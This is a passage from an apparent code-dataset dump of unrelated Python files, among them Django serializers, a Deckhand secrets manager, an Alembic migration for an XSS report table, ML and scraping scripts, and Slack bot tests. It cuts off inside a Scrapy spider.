main():\r\n\tif len(sys.argv) != 2:\r\n\t\tprint('Usage:')\r\n\t\tprint(r'python check.py [Filepath of A000000.txt]')\r\n\t\tsys.exit(0)\r\n\tfilename = sys.argv[1]\r\n\tcheck(filename)","sub_path":"pycode/checkA.py","file_name":"checkA.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"480418731","text":"from django.contrib.auth import get_user_model\nfrom rest_framework import serializers\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom core.models import Student, Professor, Institute, FieldOfStudies, Course\n\n\nclass UserRegistrationSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for user registration or creation\"\"\"\n tokens = serializers.SerializerMethodField()\n\n class Meta:\n \"\"\"Meta class for User registration serializer\"\"\"\n model = get_user_model()\n fields = ('email',\n 'password',\n 'id',\n 'name',\n 'is_professor',\n 'is_student',\n 'user_image',\n 'tokens',\n 'avatar_num')\n extra_kwargs = {'password': {'write_only': True, 'min_length': 6}}\n\n def get_tokens(self, user):\n \"\"\"Returns tokens for token authentication\"\"\"\n refresh = RefreshToken.for_user(user)\n return {\n 'refresh': str(refresh),\n 'access': str(refresh.access_token),\n }\n\n\nclass UserUpdateSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for user update or creation\"\"\"\n class Meta:\n \"\"\"Meta class for User update serializer without email as unique field\"\"\"\n model = get_user_model()\n fields = ('email',\n 'password',\n 'id',\n 'name',\n 'is_professor',\n 'is_student',\n 'is_university_administrator',\n 'user_image',\n 'avatar_num')\n extra_kwargs = {'password': {'write_only': True, 'min_length': 6}}\n\n\nclass PhotoUploadSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for user_image upload for User model\"\"\"\n\n class Meta:\n \"\"\"Meta class for PhotoUploadSerializer\"\"\"\n model = get_user_model()\n fields = ('user_image',)\n\n\nclass GeneralUserSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for getting basic User info\"\"\"\n\n class Meta:\n \"\"\"Meta class for GeneralUserSerializer\"\"\"\n model = get_user_model()\n \"\"\"Meta class for User\"\"\"\n fields = ('id', 'email', 'name')\n\n\nclass CreateUpdateStudentSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for creating or updating Student\"\"\"\n class Meta:\n \"\"\"Meta class for CreateUpdateStudentSerializer\"\"\"\n model = Student\n \"\"\"Meta class for CreateStudentSerializer\"\"\"\n fields = ('id', 'field_of_studies', 'institute', 'entry_semester', 'approx_exit_semester')\n\n\nclass CreateUpdateProfessorSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for creating or updating Professor\"\"\"\n\n class Meta:\n \"\"\"Meta class for CreateUpdateProfessorSerializer\"\"\"\n model = Professor\n \"\"\"Meta class for CreateProfessorSerializer\"\"\"\n fields = ('id', 'field_of_studies', 'institute')\n\n\nclass InstituteSerializer(serializers.ModelSerializer):\n \"\"\"Institute model serializer\"\"\"\n\n class Meta:\n \"\"\"Meta class for Institute serializer\"\"\"\n model = Institute\n fields = ('name', 'id')\n\n\nclass FieldOfStudiesSerializer(serializers.ModelSerializer):\n \"\"\"FieldOfStudies model serializer\"\"\"\n\n class Meta:\n \"\"\"Meta class for FieldOfStudies serializer\"\"\"\n model = FieldOfStudies\n fields = ['name', 'id']\n\n\nclass CourseSerializer(serializers.ModelSerializer):\n \"\"\"Course model serializer\"\"\"\n field_of_studies = FieldOfStudiesSerializer(required=True)\n professor = CreateUpdateProfessorSerializer(required=True)\n\n class Meta:\n \"\"\"Meta class for Course serializer\"\"\"\n model = Course\n fields = ['name', 'field_of_studies', 'professor', 'id']\n\n\nclass StudentSerializerWithCourses(serializers.ModelSerializer):\n \"\"\"Serializer for getting Student with courses\"\"\"\n id = serializers.ReadOnlyField()\n user = UserRegistrationSerializer(required=True)\n institute = InstituteSerializer(required=True)\n field_of_studies = FieldOfStudiesSerializer(required=True)\n courses = CourseSerializer(source=\"course_set\", many=True)\n\n class Meta:\n \"\"\"Meta class for Student serializer with courses\"\"\"\n model = Student\n fields = ('id',\n 'field_of_studies',\n 'institute', 'user',\n 'entry_semester',\n 'approx_exit_semester',\n 'courses')\n\n\nclass ProfessorSerializerWithCourses(serializers.ModelSerializer):\n \"\"\"Serializer for getting Professor with courses\"\"\"\n id = serializers.ReadOnlyField()\n user = UserRegistrationSerializer(required=True)\n institute = InstituteSerializer(required=True)\n field_of_studies = FieldOfStudiesSerializer(required=True)\n taught_courses = CourseSerializer(source=\"course_set\", many=True)\n\n class Meta:\n \"\"\"Meta class for Professor serializer with courses\"\"\"\n model = Professor\n fields = ('id',\n 'field_of_studies',\n 'institute',\n 'user',\n 'taught_courses')\n","sub_path":"app/user_administration/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"205912401","text":"# Copyright 2017 AT&T Intellectual Property. All other rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom oslo_log import log as logging\n\nfrom deckhand.barbican import driver\nfrom deckhand.db.sqlalchemy import api as db_api\nfrom deckhand.engine import document as document_wrapper\nfrom deckhand import utils\n\nLOG = logging.getLogger(__name__)\n\nCLEARTEXT = 'cleartext'\nENCRYPTED = 'encrypted'\n\n\nclass SecretsManager(object):\n \"\"\"Internal API resource for interacting with Barbican.\n\n Currently only supports Barbican.\n \"\"\"\n\n barbican_driver = driver.BarbicanDriver()\n\n def create(self, secret_doc):\n \"\"\"Securely store secrets contained in ``secret_doc``.\n\n Ordinarily, Deckhand documents are stored directly in Deckhand's\n database. However, secret data (contained in the data section for the\n documents with the schemas enumerated below) must be stored using a\n secure storage service like Barbican.\n\n Documents with ``metadata.storagePolicy`` == \"clearText\" have their\n secrets stored directly in Deckhand.\n\n Documents with ``metadata.storagePolicy`` == \"encrypted\" are stored in\n Barbican directly. Deckhand in turn stores the reference returned\n by Barbican in Deckhand.\n\n :param secret_doc: A Deckhand document with one of the following\n schemas:\n\n * ``deckhand/Certificate/v1``\n * ``deckhand/CertificateKey/v1``\n * ``deckhand/Passphrase/v1``\n\n :returns: Dictionary representation of\n ``deckhand.db.sqlalchemy.models.DocumentSecret``.\n \"\"\"\n encryption_type = secret_doc['metadata']['storagePolicy']\n secret_type = self._get_secret_type(secret_doc['schema'])\n\n if encryption_type == ENCRYPTED:\n # Store secret_ref in database for `secret_doc`.\n kwargs = {\n 'name': secret_doc['metadata']['name'],\n 'secret_type': secret_type,\n 'payload': secret_doc['data']\n }\n resp = self.barbican_driver.create_secret(**kwargs)\n\n secret_ref = resp['secret_href']\n created_secret = {'secret': secret_ref}\n elif encryption_type == CLEARTEXT:\n created_secret = {'secret': secret_doc['data']}\n\n return created_secret\n\n def _get_secret_type(self, schema):\n \"\"\"Get the Barbican secret type based on the following mapping:\n\n ``deckhand/Certificate/v1`` => certificate\n ``deckhand/CertificateKey/v1`` => private\n ``deckhand/Passphrase/v1`` => passphrase\n\n :param schema: The document's schema.\n :returns: The value corresponding to the mapping above.\n \"\"\"\n _schema = schema.split('/')[1].lower().strip()\n if _schema == 'certificatekey':\n return 'private'\n return _schema\n\n\nclass SecretsSubstitution(object):\n \"\"\"Class for document substitution logic for YAML files.\"\"\"\n\n def __init__(self, documents):\n \"\"\"SecretSubstitution constructor.\n\n :param documents: List of YAML documents in dictionary format that are\n candidates for secret substitution. This class will automatically\n detect documents that require substitution; documents need not be\n filtered prior to being passed to the constructor.\n \"\"\"\n if not isinstance(documents, (list, tuple)):\n documents = [documents]\n substitute_docs = [document_wrapper.Document(d) for d in documents if\n 'substitutions' in d['metadata']]\n self.documents = substitute_docs\n\n def substitute_all(self):\n \"\"\"Substitute all documents that have a `metadata.substitutions` field.\n\n Concrete (non-abstract) documents can be used as a source of\n substitution into other documents. This substitution is\n layer-independent, a document in the region layer could insert data\n from a document in the site layer.\n\n :returns: List of fully substituted documents.\n \"\"\"\n LOG.debug('Substituting secrets for documents: %s', self.documents)\n substituted_docs = []\n\n for doc in self.documents:\n LOG.debug(\n 'Checking for substitutions in schema=%s, metadata.name=%s',\n doc.get_name(), doc.get_schema())\n for sub in doc.get_substitutions():\n src_schema = sub['src']['schema']\n src_name = sub['src']['name']\n src_path = sub['src']['path']\n if src_path == '.':\n src_path = '.secret'\n\n # TODO(fmontei): Use secrets_manager for this logic. Need to\n # check Barbican for the secret if it has been encrypted.\n src_doc = db_api.document_get(\n schema=src_schema, name=src_name, is_secret=True,\n **{'metadata.layeringDefinition.abstract': False})\n src_secret = utils.jsonpath_parse(src_doc['data'], src_path)\n\n dest_path = sub['dest']['path']\n dest_pattern = sub['dest'].get('pattern', None)\n\n LOG.debug('Substituting from schema=%s name=%s src_path=%s '\n 'into dest_path=%s, dest_pattern=%s', src_schema,\n src_name, src_path, dest_path, dest_pattern)\n substituted_data = utils.jsonpath_replace(\n doc['data'], src_secret, dest_path, dest_pattern)\n doc['data'].update(substituted_data)\n\n substituted_docs.append(doc.to_dict())\n return substituted_docs\n","sub_path":"deckhand/engine/secrets_manager.py","file_name":"secrets_manager.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"321115746","text":"\"\"\"Added tags\n\nRevision ID: f38564e35d62\nRevises: 7dd0f5e2bfb9\nCreate Date: 2021-03-07 18:57:26.297863\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import Session\nfrom app.models import XSS\nimport json\n\n\n# revision identifiers, used by Alembic.\nrevision = \"f38564e35d62\"\ndown_revision = \"7dd0f5e2bfb9\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table(\"XSS\", schema=None) as batch_op:\n batch_op.add_column(sa.Column(\"tags\", sa.Text(), server_default=\"[]\", nullable=False))\n\n conn = op.get_bind()\n session = Session(bind=conn)\n\n for xss in session.query(XSS).all():\n xss_data = json.loads(xss.data)\n for element_name, element_value in xss_data.items():\n if element_name in [\"local_storage\", \"session_storage\", \"cookies\"]:\n if isinstance(element_value, list):\n new_data = {}\n for single_element in element_value:\n new_data.update(single_element)\n xss_data[element_name] = new_data\n xss.data = json.dumps(xss_data)\n\n xss_headers = json.loads(xss.headers)\n new_headers = {}\n if isinstance(xss_headers, list):\n for header in xss_headers:\n new_headers.update(header)\n xss.headers = json.dumps(new_headers)\n\n session.commit()\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table(\"XSS\", schema=None) as batch_op:\n batch_op.drop_column(\"tags\")\n\n # ### end Alembic commands ###\n","sub_path":"server/migrations/versions/f38564e35d62_added_tags.py","file_name":"f38564e35d62_added_tags.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"24238070","text":"#Starting in the top-left corner of a 2x2 grid, and only being able to move to the right and down, there are exactly 6 routes to the bottom-right corner.\n#How many such routes are there through a 20x20 grid?\nimport time\nfrom math import factorial as fact\n\n\ndef latt_paths(n=20):\n #Follows binomial(2*n, n)\n return fact(2*n) / (fact(n) ** 2)\n\ndef ans(times):\n l = []\n for k in xrange(times):\n start_t = time.time()\n z = latt_paths()\n end_t = time.time()\n time_taken = end_t - start_t\n l.append(time_taken)\n return sorted(l)\n","sub_path":"solved/und1sec/p15.py","file_name":"p15.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"305626399","text":"import re\r\nimport yaml\r\nimport enchant\r\nfrom nltk.corpus import wordnet\r\nfrom nltk.metrics import edit_distance\r\n\r\n#Class for removing repetitive characters from a word:\r\nclass RepetitionCorrector:\r\n def __init__(self):\r\n self.repeat_regexp = re.compile(r'(\\w*)(\\w)\\2(\\w*)')\r\n self.repl = r'\\1\\2\\3'\r\n\r\n def replace(self, word):\r\n if wordnet.synsets(word):\r\n return word\r\n\r\n repl_word = self.repeat_regexp.sub(self.repl, word)\r\n\r\n if repl_word != word:\r\n return self.replace(repl_word)\r\n else:\r\n return repl_word\r\n\r\n#Class for correcting misspelled words:\r\nclass SpellingCorrector:\r\n def __init__(self, dict_name='en-US', max_dist=2):\r\n self.spell_dict = enchant.Dict(dict_name)\r\n self.max_dist = max_dist\r\n\r\n def replace(self, word):\r\n if self.spell_dict.check(word):\r\n return word\r\n\r\n suggestions = self.spell_dict.suggest(word)\r\n if suggestions and edit_distance(word, suggestions[0]) <= self.max_dist:\r\n return suggestions[0]\r\n else:\r\n return word\r\n\r\n#Class for replacing negative words with word's antonyms:\r\nclass NegationRemover:\r\n def __init__(self, fileName):\r\n self.ant_list = yaml.load(open(fileName))\r\n\r\n def remove(self, word): \r\n return self.ant_list.get(word, word)\r\n\r\n def remove_negations(self, sent):\r\n i, l = 0, len(sent)\r\n words = []\r\n while i < l: \r\n word = sent[i]\r\n if word == 'not' and i+1 < l:\r\n antonym = self.remove(sent[i+1])\r\n if antonym:\r\n words.append(antonym)\r\n i += 2\r\n continue\r\n \r\n words.append(word)\r\n i += 1\r\n \r\n return words\r\n","sub_path":"Training and Testing/prepro_lib/text_cleaner.py","file_name":"text_cleaner.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"208243924","text":"import datetime\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.model_selection import KFold, cross_val_score\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\npd.set_option('display.max_columns', None)\r\ndataframe = pd.read_csv('features.csv', index_col='match_id')\r\ndataframe.head()\r\ndataframe.drop([\"duration\", \"tower_status_radiant\", \"tower_status_dire\", \"barracks_status_radiant\",\r\n \"barracks_status_dire\", ], axis=1, inplace=True)\r\ncountna = len(dataframe) - dataframe.count()\r\nprint(countna[countna > 0].sort_values(ascending=False))\r\ndataframe.fillna(0, inplace=True)\r\n\r\nX_train = dataframe.drop(\"radiant_win\", axis=1)\r\ny_train = dataframe[\"radiant_win\"]\r\n\r\nCV = KFold(n_splits=5, shuffle=True, random_state=42)\r\n\r\n\r\ndef score_trees(X: pd.DataFrame, y: pd.Series) -> pd.Series:\r\n scores = {}\r\n\r\n for n_estimators in [10, 20, 30, 50]:\r\n print(f\"n_estimators={n_estimators}\")\r\n model_trees = GradientBoostingClassifier(n_estimators=n_estimators, random_state=42)\r\n\r\n start_time = datetime.datetime.now()\r\n score = cross_val_score(model_trees, X, y, cv=CV, scoring=\"roc_auc\", n_jobs=-1).mean()\r\n print(f\"Score: {score:.3f}\")\r\n print(f\"Time elapsed: {datetime.datetime.now() - start_time}\")\r\n\r\n scores[n_estimators] = score\r\n print()\r\n\r\n return pd.Series(scores)\r\n\r\n\r\nscores = score_trees(X_train, y_train)\r\n\r\nscaler = StandardScaler()\r\nX_train = pd.DataFrame(scaler.fit_transform(X_train), index=X_train.index, columns=X_train.columns)\r\n\r\n\r\ndef score_linear(X: pd.DataFrame, y: pd.Series) -> pd.Series:\r\n scores = {}\r\n\r\n for i in range(-5, 6):\r\n C = 10.0 ** i\r\n\r\n print(f\"C={C}\")\r\n model = LogisticRegression(C=C, random_state=42)\r\n\r\n start_time = datetime.datetime.now()\r\n score = cross_val_score(model, X, y, cv=CV, scoring=\"roc_auc\", n_jobs=-1).mean()\r\n print(f\"Score: {score:.3f}\")\r\n print(f\"Time elapsed: {datetime.datetime.now() - start_time}\")\r\n\r\n scores[i] = score\r\n print()\r\n\r\n return pd.Series(scores)\r\n\r\n\r\ndef best_linear_score(scores: pd.Series):\r\n best_iter = scores.sort_values(ascending=False).head(1)\r\n best_C = 10.0 ** best_iter.index[0]\r\n print(f\"best_iter.index[0] = {best_iter.index}\")\r\n best_score = best_iter.values[0]\r\n\r\n print(f\"Наилучшее значение AUC-ROC при C = {best_C:.2f} равно {best_score:.2f}.\")\r\n\r\n\r\nbest_linear_score(scores)\r\n\r\nhero_columns = [f\"r{i}_hero\" for i in range(1, 6)] + [f\"d{i}_hero\" for i in range(1, 6)]\r\ncat_columns = [\"lobby_type\"] + hero_columns\r\nX_train.drop(cat_columns, axis=1, inplace=True)\r\nscores = score_linear(X_train, y_train)\r\nbest_linear_score(scores)\r\n\r\nunique_heroes = np.unique(dataframe[hero_columns].values.ravel())\r\nN = max(unique_heroes)\r\nprint(f\"Число уникальных героев в train: {len(unique_heroes)}. Максимальный ID героя: {N}.\")\r\n\r\n\r\ndef pick(data: pd.DataFrame) -> pd.DataFrame:\r\n X_pick = np.zeros((data.shape[0], N))\r\n\r\n for i, match_id in enumerate(data.index):\r\n for p in range(1, 6):\r\n X_pick[i, data.loc[match_id, f\"r{p}_hero\"] - 1] = 1\r\n X_pick[i, data.loc[match_id, f\"d{p}_hero\"] - 1] = -1\r\n\r\n return pd.DataFrame(X_pick, index=data.index, columns=[f\"hero_{i}\" for i in range(N)])\r\n\r\n\r\nX_pick = pick(dataframe)\r\nX_pick.head()\r\nX_train = pd.concat([X_train, X_pick], axis=1)\r\n\r\nscores = score_linear(X_train, y_train)\r\nbest_linear_score(scores)\r\nmodel = LogisticRegression(C=0.1, random_state=42)\r\nmodel.fit(X_train, y_train)\r\n\r\ntestframe = pd.read_csv(\"features_test.csv\", index_col=\"match_id\")\r\ntestframe.fillna(0, inplace=True)\r\n\r\nX_test = pd.DataFrame(scaler.transform(testframe), index=testframe.index, columns=testframe.columns)\r\nX_test.drop(cat_columns, axis=1, inplace=True)\r\nX_test = pd.concat([X_test, pick(testframe)], axis=1)\r\nX_test.head()\r\n\r\npredictions = pd.Series(model.predict_proba(X_test)[:, 1])\r\nprint(predictions.describe())\r\n","sub_path":"ML/final_task.py","file_name":"final_task.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"634553461","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\n\nimport pymysql\n\nclass LottoPipeline:\n def process_item(self, item, spider):\n return item\n\nclass LottoInsertNumberPipeline:\n\n def open_spider(self, spider):\n print(\"################################# open spider\")\n if spider.name == \"LottoSpider3\":\n conn = pymysql.connect(host=\"localhost\",\n database=\"exampledb\",\n user=\"root\",\n password=\"mysql\",\n charset=\"utf8\")\n \n self.conn = conn\n\n # 아래 with 구문은 테스트용 코드\n with self.conn.cursor() as cursor: # with가 종료될 때 cursor.close() 자동 호출\n sql = \"DELETE FROM WINNING_NUMBERS\"\n cursor.execute(sql) \n self.conn.commit() # 이전에 실행된 SQL 결과를 확정\n\n\n def process_item(self, item, spider):\n print(\"################################# process item\")\n if spider.name == \"LottoSpider3\":\n with self.conn.cursor() as cursor: # with가 종료될 때 cursor.close() 자동 호출\n sql = \"INSERT INTO winning_numbers values (%s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n cursor.execute(sql, item.to_list()) \n self.conn.commit() # 이전에 실행된 SQL 결과를 확정\n\n return item\n\n def close_spider(self, spider):\n print(\"################################# close spider\")\n if spider.name == \"LottoSpider3\" and self.conn != None:\n self.conn.close()\n ","sub_path":"workspaces/python-basic/scrapy/lotto/lotto/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"431668234","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\Products\\ATGoogleMaps\\config.py\n# Compiled at: 2010-06-03 09:07:26\n\"\"\"Common configuration constants\n\"\"\"\nPROJECTNAME = 'ATGoogleMaps'\nADD_PERMISSIONS = {'GMap': 'ATGoogleMaps: Add GMap', \n 'GMarker': 'ATGoogleMaps: Add GMarker', \n 'GPolyline': 'ATGoogleMaps: Add GPolyline'}","sub_path":"pycfiles/Products.ATGoogleMaps-0.7-py2.6/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"35268470","text":"\"\"\"\nTest point counter functionality\n\"\"\"\nimport unittest\n\nfrom google.auth import exceptions\n\nfrom main import PointCounter, get_client\nfrom consts import ADMIN_CHANNEL\n\nTEST_PREFECTS = [\"prefect\"]\nTEST_POINTS = \"dataset/hackathon.test.json\"\n\n\nclass TestPointCounter(unittest.TestCase):\n \"\"\"Initialize a point counter and test response messages\"\"\"\n\n def setUp(self):\n self.p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n\n def test_post_update(self):\n try:\n get_client()\n except exceptions.DefaultCredentialsError:\n print(\"Skipping bucket test - no permission file found!\")\n return\n\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS, reset=True)\n p.award_points(\"6 points to Gryffindor\", TEST_PREFECTS[0])\n p.post_update()\n\n p2 = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n self.assertEqual(p2.points['Gryffindor'], 6)\n\n def test_adding_points(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n msg = p.award_points(\"10 points to Gryffindor\", TEST_PREFECTS[0])\n self.assertIn(\"<@prefect> Gryffindor gets 10 points\", msg[0])\n\n def test_parsing_edge_case(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n edge_cases = [\n \"1 point to gryffindor for <@U15BW22P9> ... 5 years ago\",\n \"....1 point to gryffindor\",\n ]\n for slack_msg in edge_cases:\n msg = p.award_points(\n slack_msg,\n TEST_PREFECTS[0])\n self.assertIn(\"<@prefect> Gryffindor gets 1 point\", msg[0])\n\n def test_adding_points_not_by_prefect(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n msg = p.award_points(\"6 points to Gryffindor\", \"harry potter\")\n for m in msg:\n self.assertIn(\"<@harry potter> Gryffindor gets 1 point\", m)\n\n def test_adding_one_point(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n msg = p.award_points(\"oNe point to Gryffindor\", \"harry potter\")\n for m in msg:\n self.assertIn(\"<@harry potter> Gryffindor gets 1 point\", m)\n\n def test_adding_one_point_to_slytherin(self):\n msg = self.p.award_points(\n \"1 point to slytherin for @benkraft making slackbot\"\n \" listen for '911' mentions in 1s and 0s\", \"harry potter\")\n for m in msg:\n self.assertIn(\"<@harry potter> Slytherin gets 1 point\", m)\n\n def test_subtracting_one_point_prefect(self):\n msgs = self.p.award_points(\"oNe point from Gryffindor\", \"prefect\")\n self.assertIn(\"<@prefect> Gryffindor loses 1 point\", msgs[0])\n\n def test_subtracting_one_point_not_prefect(self):\n msgs = self.p.award_points(\"oNe point from Gryffindor\", \"harry potter\")\n self.assertEqual(len(msgs), 0)\n\n def test_works_with_usernames(self):\n message = \"1 point to ravenclaw <@U0NJ1PH1R>\"\n for m in self.p.award_points(message, \"nymphadora tonks\"):\n self.assertIn(\"<@nymphadora tonks> Ravenclaw gets 1 point\", m)\n\n def test_works_with_dumbledore_with_prefect(self):\n message = \"Dumbledore awards 1 point to ravenclaw <@U0NJ1PH1R>\"\n for m in self.p.award_points(message, \"prefect\", channel=ADMIN_CHANNEL):\n self.assertEqual(\n m[0], \"awards 1 point to Ravenclaw :ravenclaw: :small_green_triangle_up:\")\n self.assertEqual(m[1], \"dumbledore\")\n\n def test_works_with_dumbledore_with_prefect_with_reason(self):\n message = \"Dumbledore awards 1 point to ravenclaw <@U0NJ1PH1R> for making reason works\"\n for m in self.p.award_points(message, \"prefect\", channel=ADMIN_CHANNEL):\n self.assertEqual(\n m[0], \"awards 1 point to Ravenclaw for making reason works :ravenclaw: :small_green_triangle_up:\")\n self.assertEqual(m[1], \"dumbledore\")\n\n def test_works_with_dumbledore_takes_away_with_prefect(self):\n self.p.award_points(\"10 points to Gryffindor\",\n TEST_PREFECTS[0], channel=ADMIN_CHANNEL)\n message = \"Dumbledore takes away 1 point from Gryffindor <@U0NJ1PH1R> because of breaking reason\"\n for m in self.p.award_points(message, \"prefect\"):\n self.assertEqual(\n m[0], \"takes away 1 point from Gryffindor for breaking reason \"\n \":gryffindor: :small_red_triangle_down:\")\n self.assertEqual(m[1], \"dumbledore\")\n\n def test_works_with_dumbledore_normal(self):\n message = \"awards 1 point to ravenclaw <@U0NJ1PH1R> for cheating\"\n for m in self.p.award_points(message, \"nymphadora tonks\", channel=ADMIN_CHANNEL):\n self.assertIn(\"<@nymphadora tonks> Ravenclaw gets 1 point\", m)\n\n def test_works_with_dumbledore_says_with_prefect(self):\n message = \"Dumbledore says ho ho ho :party-khan:\"\n msg = self.p.award_points(message, \"prefect\", channel=ADMIN_CHANNEL)\n self.assertIsInstance(msg[0], tuple)\n msg_text, char = msg[0]\n self.assertEqual(msg_text, \"ho ho ho :party-khan:\")\n self.assertEqual(char, \"dumbledore\")\n\n def test_works_with_dumbledore_says_no_prefect(self):\n message = \"Dumbledore says ho ho ho :party-khan:\"\n msg = self.p.award_points(\n message, \"Harry potter\", channel=ADMIN_CHANNEL)\n self.assertEqual(len(msg), 0)\n\n def test_calculate_standings(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n p.award_points(\"6 points to Gryffindor\", TEST_PREFECTS[0])\n p.award_points(\"7 points to Ravenclaw\", TEST_PREFECTS[0])\n p.award_points(\"8 points to Hufflepuff\", TEST_PREFECTS[0])\n p.award_points(\"9 points to Slytherin\", TEST_PREFECTS[0])\n for m in p.print_status():\n print(m)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"7606733","text":"\"\"\"\n创建三个学校且三个学校的设施内容等都是一致.\n\"\"\"\nclass School(object):\n def __init__(self, name, address):\n self.name = name\n self.address = address\n\n def speech(self):\n print('讲课')\n\nobj1 = School('老男孩北京校区', '美丽富饶的沙河')\nobj2 = School('老男孩上海校区', '浦东新区')\nobj3 = School('老男孩深圳校区', '南山区')\n\n\nclass Teacher(object):\n def __init__(self, name, age, salary):\n self.name = name\n self.age = age\n self.__salary = salary\n self.school = None\n\nt1 = Teacher('李杰', 19, 188888)\nt2 = Teacher('艳涛', 18, 60)\nt3 = Teacher('女神', 16, 900000)\n# ############## 老师分配校区\nt1.school = obj1\nt2.school = obj1\nt3.school = obj2\n# ####################################\n# 查看t1老师,所在的校区名称/地址\nprint(t1.school.name)\nprint(t1.school.address)\nprint(t1.name)\nprint(t1.age)\nt1.school.speech()\n","sub_path":"p1_basic/day22_26oop/day23/11_嵌套.py","file_name":"11_嵌套.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"131952477","text":"import os\nimport yaml\nimport pandas as pd\nimport argparse\n\ndef read_params(config_path):\n with open(config_path) as yaml_file:\n config=yaml.safe_load(yaml_file)\n return config\n\ndef get_data(config_path):\n config= read_params(config_path)\n data_path=config['data_source']['s3_source']\n df=pd.read_csv(data_path,sep=',',encoding='utf-8')\n #df = pd.get_dummies(df, columns = ['famhist'], drop_first=True)\n #df.drop(\"sbp\",axis=1, inplace=True)\n return df\n\nif __name__==\"__main__\":\n args = argparse.ArgumentParser()\n args.add_argument(\"--config\", default=\"param.yaml\")\n parsed_args = args.parse_args()\n data = get_data(config_path = parsed_args.config)","sub_path":"src/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"560120074","text":"# -*- coding: utf8 -*-\nfrom datetime import datetime\nimport re\n\nfrom scrapy.http import Request, HtmlResponse\nfrom scrapy.selector import Selector\n\nfrom alascrapy.spiders.base_spiders.ala_spider import AlaSpider\nfrom alascrapy.spiders.base_spiders.bazaarvoice_spider import BVNoSeleniumSpider\nfrom alascrapy.lib.generic import get_full_url, date_format\nimport alascrapy.lib.dao.incremental_scraping as incremental_utils\nfrom alascrapy.items import CategoryItem, ProductItem, ReviewItem, ProductIdItem\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom alascrapy.lib.selenium_browser import SeleniumBrowser\n\n\nclass Cyberphoto_seSpider(AlaSpider):\n name = 'cyberphoto_se'\n allowed_domains = ['cyberphoto.se']\n start_urls = ['https://www.cyberphoto.se/bloggen']\n\n \n def parse(self, response):\n \n original_url = response.url\n product = response.meta.get(\"product\", {})\n review = response.meta.get(\"review\", {})\n \n url_xpath = \"//span[contains(.,'ta sida')]/../@href\"\n single_url = self.extract(response.xpath(url_xpath))\n single_url='/bloggen'+single_url\n if single_url:\n matches = None\n if \"\":\n matches = re.search(\"\", single_url, re.IGNORECASE)\n if 